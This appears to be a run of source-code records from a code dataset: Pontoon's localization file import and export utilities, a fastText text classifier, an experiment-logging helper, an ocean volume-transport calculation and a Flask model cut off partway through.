'/')[-1]\n\n\ndef save_entity(resource, string, string_plural=\"\", comment=\"\",\n key=\"\", source=\"\"):\n \"\"\"Admin interface: save new or update existing entity in DB.\"\"\"\n\n # Update existing entity\n try:\n if key is \"\":\n e = Entity.objects.get(\n resource=resource, string=string,\n string_plural=string_plural)\n\n else:\n e = Entity.objects.get(resource=resource, key=key)\n e.string = string\n e.string_plural = string_plural\n\n e.source = source\n\n # Set obsolete attribute for all updated entities to False\n e.obsolete = False\n\n # Add new entity\n except Entity.DoesNotExist:\n e = Entity(resource=resource, string=string,\n string_plural=string_plural, key=key, source=source)\n\n if len(comment) > 0:\n e.comment = comment\n\n e.save()\n\n\ndef save_translation(entity, locale, string, plural_form=None, fuzzy=False):\n \"\"\"Admin interface: save new or update existing translation in DB.\"\"\"\n\n approved = not fuzzy\n translations = Translation.objects.filter(\n entity=entity, locale=locale, plural_form=plural_form)\n translations_equal = translations.filter(string=string)\n translations_equal_count = translations_equal.count()\n\n # Save new translation if it doesn's exist yet\n if translations_equal_count == 0:\n unset_approved(translations)\n t = Translation(\n entity=entity, locale=locale, plural_form=plural_form,\n string=string, date=datetime.datetime.now(),\n approved=approved, fuzzy=fuzzy)\n t.save(stats=False)\n\n # Update existing translations if fuzzy status changes\n elif translations_equal_count > 0:\n t = translations_equal[0]\n if translations_equal_count > 1:\n try:\n t = translations_equal.get(approved=True)\n except Translation.DoesNotExist:\n t = translations_equal.latest(\"date\")\n\n if t.fuzzy != fuzzy:\n unset_approved(translations)\n t.date = datetime.datetime.now()\n t.approved = approved\n t.fuzzy = fuzzy\n t.save(stats=False)\n\n\ndef update_entity_count(resource, project):\n \"\"\"Save number of non-obsolete entities for a given resource.\"\"\"\n entities = Entity.objects.filter(resource=resource, obsolete=False)\n resource.entity_count = entities.count()\n resource.save()\n\n # Also make sure resource-locale Stats object exists\n for locale in project.locales.all():\n s, c = Stats.objects.get_or_create(resource=resource, locale=locale)\n\n\ndef parse_lang(path):\n \"\"\"Parse a dotlang file and return a dict of translations.\"\"\"\n trans = {}\n\n if not os.path.exists(path):\n return trans\n\n with codecs.open(path, 'r', 'utf-8', errors='replace') as lines:\n source = None\n comment = ''\n tags = []\n counter = 0\n\n for line in lines:\n line = line.strip()\n if not line:\n continue\n\n if line[0] == '#' and line[1] != '#':\n comment = line.lstrip('#').strip()\n continue\n\n if line[0] == ';':\n source = line[1:]\n\n elif source:\n for tag in ('{ok}', '{l10n-extra}'):\n if line.lower().endswith(tag):\n line = line[:-len(tag)]\n tags.append(tag)\n line = line.strip()\n trans[source] = [counter, comment, line, tags]\n comment = ''\n tags = []\n counter += 1\n\n # Sort by counter\n trans = sorted(trans.iteritems(), key=operator.itemgetter(1))\n return trans\n\n\ndef extract_po(project, locale, paths, entities=False):\n \"\"\"Extract .po (gettext) files from paths and save or update in DB.\"\"\"\n\n for path in paths:\n try:\n po = polib.pofile(path)\n escape = polib.escape\n\n relative_path = get_relative_path(path, locale)\n if relative_path[-1] == 't':\n relative_path = relative_path[:-1]\n\n resource, created = Resource.objects.get_or_create(\n project=project, path=relative_path)\n\n if entities:\n for entry in po:\n if not entry.obsolete:\n save_entity(resource=resource,\n string=escape(entry.msgid),\n string_plural=escape(entry.msgid_plural),\n comment=entry.comment,\n source=entry.occurrences)\n\n update_entity_count(resource, project)\n\n else:\n for entry in (po.translated_entries() + po.fuzzy_entries()):\n if not entry.obsolete:\n\n # Entities without plurals\n if len(escape(entry.msgstr)) > 0:\n try:\n e = Entity.objects.get(\n resource=resource,\n string=escape(entry.msgid))\n save_translation(\n entity=e,\n locale=locale,\n string=escape(entry.msgstr),\n fuzzy='fuzzy' in entry.flags)\n\n except Entity.DoesNotExist:\n continue\n\n # Pluralized entities\n elif len(entry.msgstr_plural) > 0:\n try:\n e = Entity.objects.get(\n resource=resource,\n string=escape(entry.msgid))\n for k in entry.msgstr_plural:\n save_translation(\n entity=e,\n locale=locale,\n string=escape(entry.msgstr_plural[k]),\n plural_form=k,\n fuzzy='fuzzy' in entry.flags)\n\n except Entity.DoesNotExist:\n continue\n\n update_stats(resource, locale)\n\n log.debug(\"[\" + locale.code + \"]: \" + path + \" saved to DB.\")\n except Exception as e:\n log.critical('PoExtractError for %s: %s' % (path, e))\n\n\ndef extract_properties(project, locale, paths, entities=False):\n \"\"\"Extract .properties files from paths and save or update in DB.\"\"\"\n\n parser = silme.format.properties.PropertiesFormatParser\n\n for path in paths:\n try:\n f = open(path)\n structure = parser.get_structure(f.read())\n\n comment = \"\"\n relative_path = get_relative_path(path, locale)\n resource, created = Resource.objects.get_or_create(\n project=project, path=relative_path)\n\n for obj in structure:\n if isinstance(obj, silme.core.entity.Entity):\n if entities:\n save_entity(resource=resource, string=obj.value,\n key=obj.id, comment=comment)\n comment = \"\"\n else:\n try:\n e = Entity.objects.get(\n resource=resource,\n key=obj.id)\n save_translation(\n entity=e,\n locale=locale,\n string=obj.value)\n\n except Entity.DoesNotExist:\n continue\n\n elif isinstance(obj, silme.core.structure.Comment):\n if entities:\n comment = str(obj)\n\n if entities:\n update_entity_count(resource, project)\n else:\n update_stats(resource, locale)\n\n log.debug(\"[\" + locale.code + \"]: \" + path + \" saved to DB.\")\n f.close()\n except IOError:\n log.debug(\"[\" + locale.code + \"]: \" +\n path + \" doesn't exist. Skipping.\")\n\n\ndef extract_lang(project, locale, paths, entities=False):\n \"\"\"Extract .lang files from paths and save or update in DB.\"\"\"\n\n for path in paths:\n lang = parse_lang(path)\n relative_path = get_relative_path(path, locale)\n\n resource, created = Resource.objects.get_or_create(\n project=project, path=relative_path)\n\n if entities:\n for key, value in lang:\n save_entity(resource=resource, string=key,\n comment=value[1])\n\n update_entity_count(resource, project)\n\n else:\n for key, value in lang:\n if key != value[2] or '{ok}' in value[3]:\n try:\n e = Entity.objects.get(resource=resource, string=key)\n save_translation(\n entity=e, locale=locale, string=value[2])\n\n except Entity.DoesNotExist:\n continue\n\n update_stats(resource, locale)\n\n log.debug(\"[\" + locale.code + \"]: \" + path + \" saved to DB.\")\n\n\ndef extract_ini(project, path):\n \"\"\"Extract .ini file from path and save or update in DB.\"\"\"\n\n config = configparser.ConfigParser()\n with codecs.open(path, 'r', 'utf-8') as f:\n try:\n config.read_file(f)\n except Exception as e:\n log.debug(\"INI configparser: \" + str(e))\n\n sections = config.sections()\n\n source_locale = None\n for s in ('templates', 'en-US', 'en-GB', 'en'):\n if s in sections:\n source_locale = s\n break\n if source_locale is None:\n log.error(\"Unable to detect source locale\")\n raise Exception(\"error\")\n\n # Move source locale on top, so we save entities first, then translations\n sections.insert(0, sections.pop(sections.index(source_locale)))\n\n resource, created = Resource.objects.get_or_create(\n project=project, path=path)\n\n for section in sections:\n try:\n locale = Locale.objects.get(code=section)\n except Locale.DoesNotExist:\n log.debug(\"Locale not supported: \" + section)\n break\n\n for item in config.items(section):\n if section == source_locale:\n save_entity(resource=resource, string=item[1],\n key=item[0])\n else:\n try:\n e = Entity.objects.get(\n resource=resource, key=item[0])\n save_translation(\n entity=e, locale=locale, string=item[1])\n except Entity.DoesNotExist:\n log.debug(\"[\" + section + \"]: line ID \" +\n item[0] + \" is obsolete.\")\n continue\n\n if section == source_locale:\n update_entity_count(resource, project)\n else:\n update_stats(resource, locale)\n\n log.debug(\"[\" + section + \"]: saved to DB.\")\n\n\ndef extract_to_database(project, locales=None):\n \"\"\"Extract data from project files and save or update in DB.\"\"\"\n log.debug(\"Extract data from project files and save or update in DB.\")\n\n repository_path_master = get_repository_path_master(project)\n source_directory = get_source_directory(repository_path_master)\n\n source_locale = 'en-US'\n if not source_directory['name'] in ('', 'templates'):\n source_locale = source_directory['name']\n\n if not locales:\n # Mark all existing project entities as obsolete\n resources = Resource.objects.filter(project=project)\n Entity.objects.filter(resource__in=resources).update(obsolete=True)\n\n locales = [Locale.objects.get(code=source_locale)]\n locales.extend(project.locales.all())\n\n isFile = project.repository_type == 'file'\n source_paths = get_source_paths(source_directory['path'])\n\n if project.format == 'ini':\n try:\n extract_ini(project, source_paths[0])\n except Exception as e:\n if isFile:\n os.remove(file_path)\n return\n\n for index, locale in enumerate(locales):\n if locale.code == source_locale:\n paths = source_paths\n entities = True\n else:\n paths = get_locale_paths(project, locale)\n entities = isFile\n globals()['extract_%s' % project.format](\n project, locale, paths, entities)\n\n\ndef update_from_repository(project, locales=None):\n \"\"\"\n Update project files from remote repository.\n\n Args:\n project: Project instance\n locales: List of Locale instances\n \"\"\"\n log.debug(\"Update project files from remote repository.\")\n\n repository_type = project.repository_type\n repository_url = project.repository_url\n repository_path = repository_path_master = \\\n get_repository_path_master(project)\n\n # If one-locale repo, set repository_url_master and update repository_path\n repository_url_master = False\n ending = os.path.basename(os.path.normpath(repository_url))\n\n if ending in ('templates', 'en-US', 'en-GB', 'en'):\n repository_url_master = repository_url.rsplit(ending, 1)[0]\n repository_path = os.path.join(repository_path_master, ending)\n\n # Save file to server\n if repository_type == 'file':\n\n u = urllib2.urlopen(repository_url)\n file_name = repository_url.rstrip('/').rsplit('/', 1)[1]\n file_path = os.path.join(repository_path_master, file_name)\n\n if not os.path.exists(repository_path_master):\n os.makedirs(repository_path_master)\n\n try:\n with open(file_path, 'w') as f:\n f.write(u.read().decode(\"utf-8-sig\").encode(\"utf-8\"))\n except IOError as e:\n log.debug(\"IOError: \" + str(e))\n\n # Detect format\n temp, file_extension = os.path.splitext(file_name)\n format = file_extension[1:].lower()\n format = 'po' if format == 'pot' else format\n\n # Save files to server\n else:\n\n if not locales:\n update_from_vcs(repository_type, repository_url, repository_path)\n\n if repository_url_master: # One-locale repo\n if not locales:\n locales = project.locales.all()\n for l in locales:\n update_from_vcs(\n repository_type,\n os.path.join(repository_url_master, l.code),\n os.path.join(repository_path_master, l.code))\n\n elif locales:\n if repository_type == 'svn':\n for l in locales:\n path = get_locale_directory(project, l)[\"path\"]\n update_from_vcs(repository_type, None, path)\n\n else:\n update_from_vcs(\n repository_type, repository_url, repository_path)\n\n # Detect format\n source_directory = get_source_directory(repository_path_master)\n format = detect_format(source_directory['path'])\n\n # Store project format and repository_path\n project.format = format\n project.repository_path = repository_path\n project.save()\n\n\ndef dump_po(project, locale):\n \"\"\"Update .po (gettext) files from database.\"\"\"\n\n locale_paths = get_locale_paths(project, locale)\n\n for path in locale_paths:\n po = polib.pofile(path)\n date = datetime.datetime(1, 1, 1)\n newest = Translation()\n relative_path = get_relative_path(path, locale)\n resource = Resource.objects.filter(project=project, path=relative_path)\n entities = Entity.objects.filter(resource=resource, obsolete=False)\n\n for entity in entities:\n entry = po.find(polib.unescape(smart_text(entity.string)))\n if entry:\n if not entry.msgid_plural:\n translation = get_translation(entity=entity, locale=locale)\n if translation.string != '':\n entry.msgstr = polib.unescape(translation.string)\n if translation.date > date:\n date = translation.date\n newest = translation\n if ('fuzzy' in entry.flags and not translation.fuzzy):\n entry.flags.remove('fuzzy')\n\n else:\n for i in range(0, 6):\n if i < (locale.nplurals or 1):\n translation = get_translation(\n entity=entity, locale=locale, plural_form=i)\n if translation.string != '':\n entry.msgstr_plural[unicode(i)] = \\\n polib.unescape(translation.string)\n if translation.date > date:\n date = translation.date\n newest = translation\n if ('fuzzy' in entry.flags and\n not translation.fuzzy):\n entry.flags.remove('fuzzy')\n # Remove obsolete plural forms if exist\n else:\n if unicode(i) in entry.msgstr_plural:\n del entry.msgstr_plural[unicode(i)]\n\n # Update PO metadata\n if newest.id:\n po.metadata['PO-Revision-Date'] = newest.date\n if newest.user:\n po.metadata['Last-Translator'] = '%s <%s>' \\\n % (newest.user.first_name, newest.user.email)\n po.metadata['Language'] = locale.code\n po.metadata['X-Generator'] = 'Pontoon'\n\n if locale.nplurals:\n po.metadata['Plural-Forms'] = 'nplurals=%s; plural=%s;' \\\n % (str(locale.nplurals), locale.plural_rule)\n\n po.save()\n log.debug(\"File updated: \" + path)\n\n\ndef dump_properties(project, locale):\n \"\"\"Update .properties files from database. Generate files from source\n files, but only ones with translated strings.\"\"\"\n\n resources = Resource.objects.filter(project=project)\n entities = Entity.objects.filter(resource__in=resources, obsolete=False)\n locale_directory_path = get_locale_directory(project, locale)[\"path\"]\n\n # Remove all non-hidden files and folders in locale repository\n items = os.listdir(locale_directory_path)\n items = [i for i in items if not i[0] == '.']\n for item in items:\n path = os.path.join(locale_directory_path, item)\n try:\n shutil.rmtree(path)\n except OSError:\n os.remove(path)\n except Exception as e:\n log.error(e)\n\n parser = silme.format.properties.PropertiesFormatParser\n source_directory = get_source_directory(project.repository_path)\n\n # Get relative paths to translated files only\n translations = Translation.objects.filter(\n entity__in=entities, locale=locale)\n\n entities_pks = translations.values(\"entity\").distinct()\n entities_translated = Entity.objects.filter(pk__in=entities_pks)\n resources_pks = entities_translated.values(\"resource\").distinct()\n resources_translated = Resource.objects.filter(pk__in=resources_pks)\n\n relative_paths = resources_translated.values_list(\"path\").distinct()\n\n for relative in relative_paths:\n path = os.path.join(locale_directory_path, relative[0])\n\n # Create folders and copy files from source\n basedir = os.path.dirname(path)\n if not os.path.exists(basedir):\n os.makedirs(basedir)\n try:\n shutil.copy(\n os.path.join(source_directory['path'], relative[0]), path)\n # Obsolete files\n except Exception as e:\n log.debug(e)\n continue\n\n with codecs.open(path, 'r+', 'utf-8') as f:\n structure = parser.get_structure(f.read())\n resource = resources.filter(path=relative[0])\n entities_with_path = entities.filter(resource=resource)\n\n for entity in entities_with_path:\n key = entity.key\n translation = get_translation(entity=entity, locale=locale)\n\n try:\n if (translation.string != '' or\n translation.pk is not None):\n # Modify translated entities\n structure.modify_entity(key, translation.string)\n else:\n # Remove untranslated and following newline\n pos = structure.entity_pos(key)\n structure.remove_entity(key)\n line = structure[pos]\n\n if type(line) == unicode and line.startswith('\\n'):\n line = line[len('\\n'):]\n structure[pos] = line\n if len(line) is 0:\n structure.remove_element(pos)\n\n # Obsolete entities\n except KeyError as e:\n pass\n\n # Erase file and then write, otherwise content gets appended\n f.seek(0)\n f.truncate()\n content = parser.dump_structure(structure)\n f.write(content)\n\n log.debug(\"File updated: \" + path)\n\n\ndef dump_lang(project, locale):\n \"\"\"Update .lang files from database.\"\"\"\n\n locale_paths = get_locale_paths(project, locale)\n\n for path in locale_paths:\n relative_path = get_relative_path(path, locale)\n\n try:\n resource = Resource.objects.get(\n project=project, path=relative_path)\n except Resource.DoesNotExist as e:\n log.error('Resource does not exist')\n continue\n\n with codecs.open(path, 'r+', 'utf-8', errors='replace') as lines:\n content = []\n translation = None\n\n for line in lines:\n if translation:\n # Keep newlines and white spaces in line if present\n trans_line = line.replace(line.strip(), translation)\n content.append(trans_line)\n translation = None\n continue\n\n content.append(line)\n line = line.strip()\n\n if not line:\n continue\n\n if line[0] == ';':\n original = line[1:].strip()\n\n try:\n entity = Entity.objects.get(\n resource=resource, string=original)\n except Entity.DoesNotExist as e:\n log.error('%s: Entity \"%s\" does not exist %s' %\n (path, original, project.name))\n continue\n\n translation = get_translation(\n entity=entity, locale=locale).string\n if translation == '':\n translation = original\n elif translation == original:\n translation += ' {ok}'\n\n # Erase file and then write, otherwise content gets appended\n lines.seek(0)\n lines.truncate()\n lines.writelines(content)\n log.debug(\"File updated: \" + path)\n\n\ndef dump_ini(project, locale):\n \"\"\"Update .ini files from database.\"\"\"\n\n path = get_locale_directory(project, locale)[\"path\"]\n source_path = get_source_paths(path)[0]\n resource = Resource.objects.get(project=project, path=source_path)\n entities = Entity.objects.filter(resource=resource, obsolete=False)\n config = configparser.ConfigParser()\n\n with codecs.open(source_path, 'r+', 'utf-8', errors='replace') as f:\n try:\n config.read_file(f)\n if config.has_section(locale.code):\n\n for entity in entities:\n key = entity.key\n translation = get_translation(\n entity=entity, locale=locale).string\n\n config.set(locale.code, key, translation)\n\n # Erase and then write, otherwise content gets appended\n f.seek(0)\n f.truncate()\n config.write(f)\n log.debug(\"File updated: \" + source_path)\n\n else:\n log.debug(\"Locale not available in the source file\")\n raise Exception(\"error\")\n\n except Exception as e:\n log.debug(\"INI configparser: \" + str(e))\n\n\ndef dump_from_database(project, locale):\n \"\"\"Update project files from database.\"\"\"\n log.debug(\"Update project files from database.\")\n\n path = get_locale_directory(project, locale)[\"path\"]\n if not path:\n return False\n\n globals()['dump_%s' % project.format](project, locale)\n return path\n\n\ndef generate_zip(project, locale):\n \"\"\"\n Generate .zip of all project files for the specified locale.\n\n Args:\n project: Project instance\n locale: Locale code\n Returns:\n A string for generated ZIP content.\n \"\"\"\n log.debug(\"Generate .zip of all project files for the specified locale.\")\n\n try:\n locale = Locale.objects.get(code=locale)\n except Locale.DoesNotExist as e:\n log.error(e)\n\n path = dump_from_database(project, locale)\n if not path:\n return False\n\n s = StringIO.StringIO()\n zf = zipfile.ZipFile(s, \"w\")\n\n # ZIP empty root directory to avoid corrupt archive if no file translated\n root = os.path.split(path)[-1]\n zf.write(path, root)\n\n for root, dirs, filenames in os.walk(path):\n for f in filenames:\n file_path = os.path.join(root, f)\n zip_path = os.path.relpath(file_path, os.path.join(path, '..'))\n zf.write(file_path, zip_path)\n\n zf.close()\n return s.getvalue()\n","sub_path":"pontoon/administration/utils/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":32984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"117911721","text":"import numpy as np\r\nimport os,re\r\nfrom fasttext import train_supervised,load_model\r\n\r\n\r\nclass fasttext_classfication(object):\r\n def __init__(self):\r\n pass\r\n\r\n def train_model(self, trainFilePath=None, dim=100, epoch=5, lr=0.1, loss='softmax',minCount=1):\r\n np.set_printoptions(suppress=True)\r\n model = f'./model/fastText_dataDim{str(dim)}_lr{str(lr)}_iter{str(epoch)}.model'\r\n\r\n if os.path.isfile(model):\r\n classifier = load_model(model)\r\n else:\r\n classifier = train_supervised(input=trainFilePath, label='__label__', dim=dim, epoch=epoch,\r\n lr=lr, wordNgrams=2, loss=loss,minCount=minCount)\r\n \"\"\"\r\n 训练一个监督模型, 返回一个模型对象\r\n \r\n @param input: 训练数据文件路径\r\n @param lr: 学习率\r\n @param dim: 向量维度\r\n @param ws: cbow模型时使用\r\n @param epoch: 次数\r\n @param minCount: 词频阈值, 小于该值在初始化时会过滤掉\r\n @param minCountLabel: 类别阈值,类别小于该值初始化时会过滤掉\r\n @param minn: 构造subword时最小char个数\r\n @param maxn: 构造subword时最大char个数\r\n @param neg: 负采样\r\n @param wordNgrams: n-gram个数\r\n @param loss: 损失函数类型, softmax, ns: 负采样, hs: 分层softmax\r\n @param bucket: 词扩充大小, [A, B]: A语料中包含的词向量, B不在语料中的词向量\r\n @param thread: 线程个数, 每个线程处理输入数据的一段, 0号线程负责loss输出\r\n @param lrUpdateRate: 学习率更新\r\n @param t: 负采样阈值\r\n @param label: 类别前缀\r\n @param verbose: ??\r\n @param pretrainedVectors: 预训练的词向量文件路径, 如果word出现在文件夹中初始化不再随机\r\n @return model object\r\n \"\"\"\r\n classifier.save_model(model)\r\n return classifier\r\n\r\n\r\n def cal_precision_and_recall(self,model_path='',testFilePath=''):\r\n if os.path.isfile(model_path):\r\n model = load_model(model_path)\r\n result = model.test(path=testFilePath)\r\n precision = result[1]\r\n recall = result[2]\r\n F1 = (2 * precision * recall) / (precision + recall)\r\n\r\n print('测试样本数据量 ', result[0])\r\n print('precision: {:.4f}'.format(precision))\r\n print('recall: {:.4f}'.format(recall))\r\n print('F1-precision: {:.4f}'.format(F1))\r\n return precision, recall, F1\r\n else:\r\n print('您提供了一个非法的模型路径......')\r\n\r\n def predict(self,model_path='',input=\"Why not put knives in the dishwasher?\",k=2):\r\n\r\n input_ = ' '.join(re.findall(pattern=r\"([a-zA-Z0-9\\u4E00-\\u9FA5]+)\",string=input))\r\n\r\n if os.path.isfile(model_path):\r\n model = load_model(model_path)\r\n result = model.predict(input_, k)\r\n print(result)\r\n return result\r\n\r\nif __name__ == '__main__':\r\n\r\n flag=2\r\n fs = fasttext_classfication()\r\n if flag==0:\r\n # 训练并保存模型\r\n train_path = f'./data/fasttext_cook/cooking.train'\r\n fs.train_model(trainFilePath=train_path,epoch=200)\r\n elif flag==1:\r\n # 计算模型准确率,召回率,F1\r\n _, _, _ = fs.cal_precision_and_recall(model_path='./model/fastText_dataDim100_lr0.1_iter200.model',\r\n testFilePath='./data/fasttext_cook/cooking.valid')\r\n elif flag == 2:\r\n #模型预测\r\n _ = fs.predict(model_path='./model/fastText_dataDim100_lr0.1_iter200.model',\r\n input=\"Why not put knives in the dishwasher?\")\r\n\r\n\r\n\r\n","sub_path":"fasttext_classfication.py","file_name":"fasttext_classfication.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"54162599","text":"import logging\nfrom typing import Any, Tuple, Dict\nfrom dataclasses import dataclass\nfrom .timer import Timer\n\n_logger = logging.getLogger(__name__)\n\n\n# TODO:\n# no rerun when already existing\n# colorlog\n# product state\n# persistent storage\n# convert experiment_store to pandas DataFrame (args as own field)\n\n\n@dataclass\nclass FuncCall:\n func: Any\n args: Tuple[Any]\n kwargs: Dict[str, Any]\n\n\nclass FuncCallOutcome:\n pass\n\n\n@dataclass\nclass FuncCallResult(FuncCallOutcome):\n func_call: FuncCall\n result: Any\n duration: float\n\n\n@dataclass\nclass FuncCallException(FuncCallOutcome):\n func_call: FuncCall\n exception: Any\n duration: float\n\n\nclass Experiments:\n def __init__(self, experiment_store=None, failed_experiment_store=None):\n self.experiment_store = experiment_store or []\n self.failed_experiment_store = failed_experiment_store or []\n\n self.last_logged_func_call_result = None\n\n def __call__(self, func, *args, **kwargs):\n func_call = FuncCall(func=func, args=args, kwargs=kwargs)\n\n cur_func_call_result = self._func_call_result(func_call)\n\n self._store_result(cur_func_call_result)\n self._log(cur_func_call_result)\n\n return cur_func_call_result\n\n @staticmethod\n def _func_call_result(func_call) -> FuncCallOutcome:\n timer = Timer()\n\n try:\n func_result = func_call.func(*func_call.args, **func_call.kwargs)\n exception = None\n except Exception as exc:\n func_result = None\n exception = exc\n\n duration = timer.duration()\n\n if exception is None:\n return FuncCallResult(\n func_call=func_call, result=func_result, duration=duration\n )\n else:\n return FuncCallException(\n func_call=func_call, exception=exception, duration=duration\n )\n\n def _store_result(self, func_call_result):\n if isinstance(func_call_result, FuncCallResult):\n self.experiment_store.append(func_call_result)\n else:\n self.failed_experiment_store.append(func_call_result)\n\n def _log(self, func_call_result):\n func_name = func_call_result.func_call.func.__name__\n args_text = \", \".join(map(str, func_call_result.func_call.args))\n kwargs_text = \", \".join(\n f\"{key}={val}\" for key, val in func_call_result.func_call.kwargs.items()\n )\n func_call_text = (\n f\"{func_name}({', '.join(filter(None, [args_text, kwargs_text]))})\"\n )\n\n duration_text = str(func_call_result.duration)\n\n if isinstance(func_call_result, FuncCallResult):\n result = func_call_result.result\n _logger.info(f\"{func_call_text} --> {result} (in {duration_text})\")\n else:\n exception = func_call_result.exception\n _logger.error(\n f\"{func_call_text} failed with {exception} (in {duration_text})\"\n )\n\n\n","sub_path":"dstk/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"427405539","text":"import os\nimport pickle\nimport numpy as np\nimport netCDF4 as nc\nfrom itertools import compress\nimport datetime as dt\nfrom joblib import Parallel\nimport xarray as xr\n\n#-------------------------------------------------------------\n\nyears=[2015]\nresults_folder = 'Stephan-2022-transport/'\n\n# coordinates of boundaries for which to calculate fluxes:----\nNSi = np.arange(1580,1630); NSj = 630; # Nares Strait\nLSi = 1584; LSj = np.arange(496,534); # Lancaster Sound\nJSi = 1609; JSj = np.arange(554,583); # Jones Sound\n\n#-------------------------------------------------------------\n# Load files:\nmask = nc.Dataset('/ocean/brogalla/GEOTRACES/data/ANHA12/ANHA12_mask.nc') \numask = np.array(mask.variables['umask'])[0,:,:,:]\nvmask = np.array(mask.variables['vmask'])[0,:,:,:]\n\nmesh = nc.Dataset('/ocean/brogalla/GEOTRACES/data/ANHA12/ANHA12_mesh1.nc')\ne1v_base = np.array(mesh.variables['e1v'])[0,:,:]\ne2u_base = np.array(mesh.variables['e2u'])[0,:,:]\ne3t = np.array(mesh.variables['e3t_0'])[0,:,:,:]\ne3v = np.array(mesh.variables['e3v_0'])[0,:,:,:]\ne3u = np.array(mesh.variables['e3u_0'])[0,:,:,:]\ndepth = np.array(mesh.variables['nav_lev'])\n\ne1v = np.empty_like(e3t[:,:,:]); e1v[:] = e1v_base\ne2u = np.empty_like(e3t[:,:,:]); e2u[:] = e2u_base\n\n#-------------------------------------------------------------\ndef files_time_series(year, start_date, end_date):\n #start_date and end_date are datetime objects\n \n # Create list of filenames that fall within the start and end date time range:\n dyn_file_list = np.sort(os.listdir('/data/brogalla/ANHA12/'))\n \n Vlist = [i[26:31]=='gridV' for i in dyn_file_list]\n Ulist = [i[26:31]=='gridU' for i in dyn_file_list]\n \n gridV_list = list(compress(dyn_file_list, Vlist))\n gridU_list = list(compress(dyn_file_list, Ulist))\n \n dateV_list = [dt.datetime.strptime(i[14:25], \"y%Ym%md%d\") for i in gridV_list]\n dateU_list = [dt.datetime.strptime(i[14:25], \"y%Ym%md%d\") for i in gridU_list]\n \n gridV_file_list = list(compress(gridV_list, [V > start_date and V < end_date for V in dateV_list]))\n gridU_file_list = list(compress(gridU_list, [U > start_date and U < end_date for U in dateU_list]))\n \n return gridV_file_list, gridU_file_list\n\ndef main_calc(year, filenameU, filenameV): \n \n # Load 5-day velocity file\n dyn_folder = '/data/brogalla/ANHA12/'\n file_u = nc.Dataset(dyn_folder + filenameU)\n file_v = nc.Dataset(dyn_folder + filenameV)\n u_vel = np.array(file_u.variables['vozocrtx'])[0,:,:,:] \n v_vel = np.array(file_v.variables['vomecrty'])[0,:,:,:] \n \n # For each of the boundaries, call function to calculate the flux:\n flx_LS = calc_flux(LSi, LSj, u_vel, v_vel)\n flx_NS = calc_flux(NSi, NSj, u_vel, v_vel)\n flx_JS = calc_flux(JSi, JSj, u_vel, v_vel)\n \n return flx_LS, flx_NS, flx_JS\n\ndef calc_flux(i, j, u_vel, v_vel): \n i = np.array(i)\n j = np.array(j)\n\n # horizontal boundary\n if i.size > j.size: \n bdy_vel = u_vel[:, i[0]:i[-1], j]\n area = e2u[:, i[0]:i[-1], j] * e3u[:,i[0]:i[-1],j]\n cond_mask = (umask[:,i[0]:i[-1],j] < 0.1)\n \n # vertical boundary\n else: \n bdy_vel = v_vel[:, i , j[0]:j[-1]]\n area = e1v[:, i , j[0]:j[-1]] * e3v[:,i,j[0]:j[-1]]\n cond_mask = (vmask[:,i,j[0]:j[-1]] < 0.1)\n \n # Point-wise multiplication with areas of each of the grid boxes:\n flx_V = np.multiply(bdy_vel, area)\n \n # Mask the depth levels that correspond to points on land:\n flx_mask_V = np.ma.masked_where(cond_mask, flx_V)\n \n return flx_mask_V\n\n#-------------------------------------------------------------\n\nfor year in years:\n # Create list of five-day files:\n print(year)\n start_date = dt.datetime(year,1,1)\n end_date = dt.datetime(year,12,31)\n gridV_files, gridU_files = files_time_series(year, start_date, end_date)\n print(len(gridV_files), len(gridU_files))\n \n # call the function for each file that is within range of start date, end date\n a = len(gridV_files)\n time_series_LS = np.empty((a, 50, LSj.size-1)); \n time_series_NS = np.empty((a, 50, NSi.size-1)); \n time_series_JS = np.empty((a, 50, JSj.size-1)); \n \n for f, V_file in enumerate(gridV_files):\n print(f)\n time_LS, time_NS, time_JS = main_calc(year, gridU_files[f], V_file)\n time_series_LS[f,:,:] = time_LS\n time_series_NS[f,:,:] = time_NS\n time_series_JS[f,:,:] = time_JS\n \n #Save time series to files:\n file_write = xr.Dataset(\n {'transport_LS': ((\"t\",\"z\",\"yLS\"), time_series_LS),\n 'transport_NS': ((\"t\",\"z\",\"xNS\"), time_series_NS),\n 'transport_JS': ((\"t\",\"z\",\"yJS\"), time_series_JS)},\n coords = {\n \"t\": np.zeros(a),\n \"z\": depth, \n \"yLS\": np.zeros(LSj.size-1),\n \"xNS\": np.zeros(NSi.size-1),\n \"yJS\": np.zeros(JSj.size-1)\n },\n attrs = {\n 'long_name':'Volume transport time series',\n 'units':'m3/s',\n }\n )\n file_write.to_netcdf(f'{results_folder}time-series-{year}.nc')\n","sub_path":"Stephan/volume-time-series.py","file_name":"volume-time-series.py","file_ext":"py","file_size_in_byte":5140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"565133683","text":"from flask import Flask,render_template\nimport json\nimport os\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\nfrom pymongo import MongoClient\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root@localhost/app'\ndb = SQLAlchemy(app)\n\nclient = MongoClient('127.0.0.1',27017)\nmdb = client.app1\n\nclass File(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(80))\n created_time = db.Column(db.DateTime)\n content = db.Column(db.Text)\n category_id = db.Column(db.Integer,db.ForeignKey('category.id'))\n category = db.relationship('Category', backref=db.backref('files', lazy='dynamic'))\n #tags = []\n\n def __init__(self, title, category, content):\n self.title = title\n created_time = datetime.utcnow()\n self.category = category\n self.content = content\n #self.tags = []\n\n def __repr__(self):\n return '' % self.title\n\n def add_tag(self, tag_name):\n mfile = mdb.mfile.find_one({'title':self.title})\n #print(mfile)\n if not mfile:\n tags = self.tags\n tags.append(tag_name)\n mfile = {'title':self.title,'tags':tags}\n mdb.mfile.insert_one(mfile)\n elif not mfile['tags']:\n tags = self.tags\n tags.append(tag_name)\n mdb.mfile.update_one({'title':self.title},{'$set':{'tags':tags}})\n else:\n tags = mfile['tags']\n if tag_name in mfile['tags']:\n 